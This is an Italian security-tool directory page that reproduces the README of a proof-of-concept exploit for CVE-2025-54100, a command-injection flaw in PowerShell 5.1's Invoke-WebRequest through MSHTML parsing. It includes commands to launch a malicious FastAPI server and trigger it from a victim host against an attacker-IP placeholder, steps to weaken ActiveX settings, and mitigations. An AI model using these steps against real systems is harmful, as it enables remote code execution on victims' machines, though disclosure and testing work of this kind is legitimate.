Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-54100 — CVE-2025-54100 (CVSS 7.8 Alto) è una vulnerabilità di command injection nel cmdlet Invoke-WebRequest di Windows PowerShell 5.1. Deriva da una neutralizzazione impropria di elementi speciali durante l'analisi automatica delle risposte Web. | Kitploit
Strumenti/GitHubGitHub/themehackers/cve-2025-54100
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingPaper e RicercaApprendimento e Formazione
GitHubthemehackers/cve-2025-54100

CVE-2025-54100

CVE-2025-54100 (CVSS 7.8 Alto) è una vulnerabilità di command injection nel cmdlet Invoke-WebRequest di Windows PowerShell 5.1. Deriva da una neutralizzazione impropria di elementi speciali durante l'analisi automatica delle risposte Web.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
3178 mesi faRevisionato da Kitploit

CVE-2025-54100 – PoC di Analisi della Risposta di PowerShell

Un Proof-of-Concept conciso che mostra come CVE-2025-54100 possa portare a Esecuzione di Codice Remoto (RCE) in Windows PowerShell 5.1 attraverso il parsing HTML dannoso.

Sommario

  • Cos'è CVE-2025-54100?
  • Come Funziona il PoC
  • Avvio Rapido
  • Attivazione da un Host Vittima
  • Risoluzione Problemi e Verifica
  • Evidenza
  • Mitigazione
  • Disclaimer
  • Riferimenti

Cos'è CVE-2025-54100?

  • Tipo: Iniezione di comandi in Invoke-WebRequest quando non si utilizza -UseBasicParsing
  • Gravità: CVSS 7.8 (Alta)
  • Causa principale: Il parsing basato su MSHTML delle risposte HTML consente l'esecuzione di script (ad es., ActiveXObject) nel contesto del chiamante.
  • Interessati: Windows 10/11 e Windows Server 2008-2025 che eseguono PowerShell 5.1.

Come Funziona il PoC

  1. Il server FastAPI in CVE-2025-54100.py serve un payload HTML appositamente costruito.
  2. Il payload tenta di istanziare oggetti ActiveX WScript.Shell / Shell.Application.
  3. Su host vulnerabili, il parser MSHTML esegue lo script, dimostrando RCE avviando calc.exe.
  4. Il payload fornito è intenzionalmente minimo e non distruttivo ma può essere modificato per ulteriori ricerche.

Avvio Rapido

Prerequisiti

  • Python 3.10+ (testato con FastAPI e Uvicorn)
  • Installa le dipendenze:
    root@kitploit:~
    python3 -m venv .venv
    source .venv/bin/activate
    pip3 install -r requirements.txt
    

Avvia il server dannoso

Avvia il server HTTP del PoC:

root@kitploit:~
uvicorn app:app --host 0.0.0.0  --port 8888 --reload

Attivazione da un Host Vittima

Esegui questi su una macchina Windows vulnerabile senza -UseBasicParsing:

root@kitploit:~
# Invoke-WebRequest
Invoke-WebRequest -Uri "http://<attacker-ip>:8888"
# curl alias
curl http://<attacker-ip>:8888
# mshta
mshta http://<attacker-ip>:8888

Usa la stessa porta che hai configurato per il server. Se vulnerabile, lo script incorporato viene eseguito tramite il parser MSHTML. Alcuni prodotti AV potrebbero bloccare il comportamento anche se il problema di parsing è presente.

Risoluzione Problemi e Verifica

Se calc.exe non appare:

  1. Apri Opzioni Internet sulla vittima.
  2. Vai a Sicurezza → Livello personalizzato...
  3. Abilita “Inizializza e scrivi script per controlli ActiveX non contrassegnati come sicuri per lo scripting.”
  4. Esegui nuovamente Invoke-WebRequest senza -UseBasicParsing.

Questo dimostra il vettore di esecuzione. I payload reali potrebbero utilizzare offuscamento o bypass aggiuntivi per eludere le restrizioni predefinite.

Evidenza

PoC

Mitigazione

Microsoft ha corretto il problema a dicembre 2025:

  1. Applica gli aggiornamenti di sicurezza sugli host Windows interessati.
  2. Usa -UseBasicParsing per evitare il parsing MSHTML:
    root@kitploit:~
    Invoke-WebRequest -Uri "http://<attacker-ip>:8888" -UseBasicParsing
    
  3. Passa a PowerShell 7+ (pwsh), che non si basa su MSHTML per il parsing.

Disclaimer

[!WARNING] Solo per uso educativo e test autorizzati. Utilizza responsabilmente e rispetta tutte le leggi applicabili. Gli autori non sono responsabili per uso improprio o danni.

Riferimenti

  • NVD: CVE-2025-54100
  • MSRC: Update Guide
  • GitHub: osman1337-security/CVE-2025-54100
Scarica lo strumento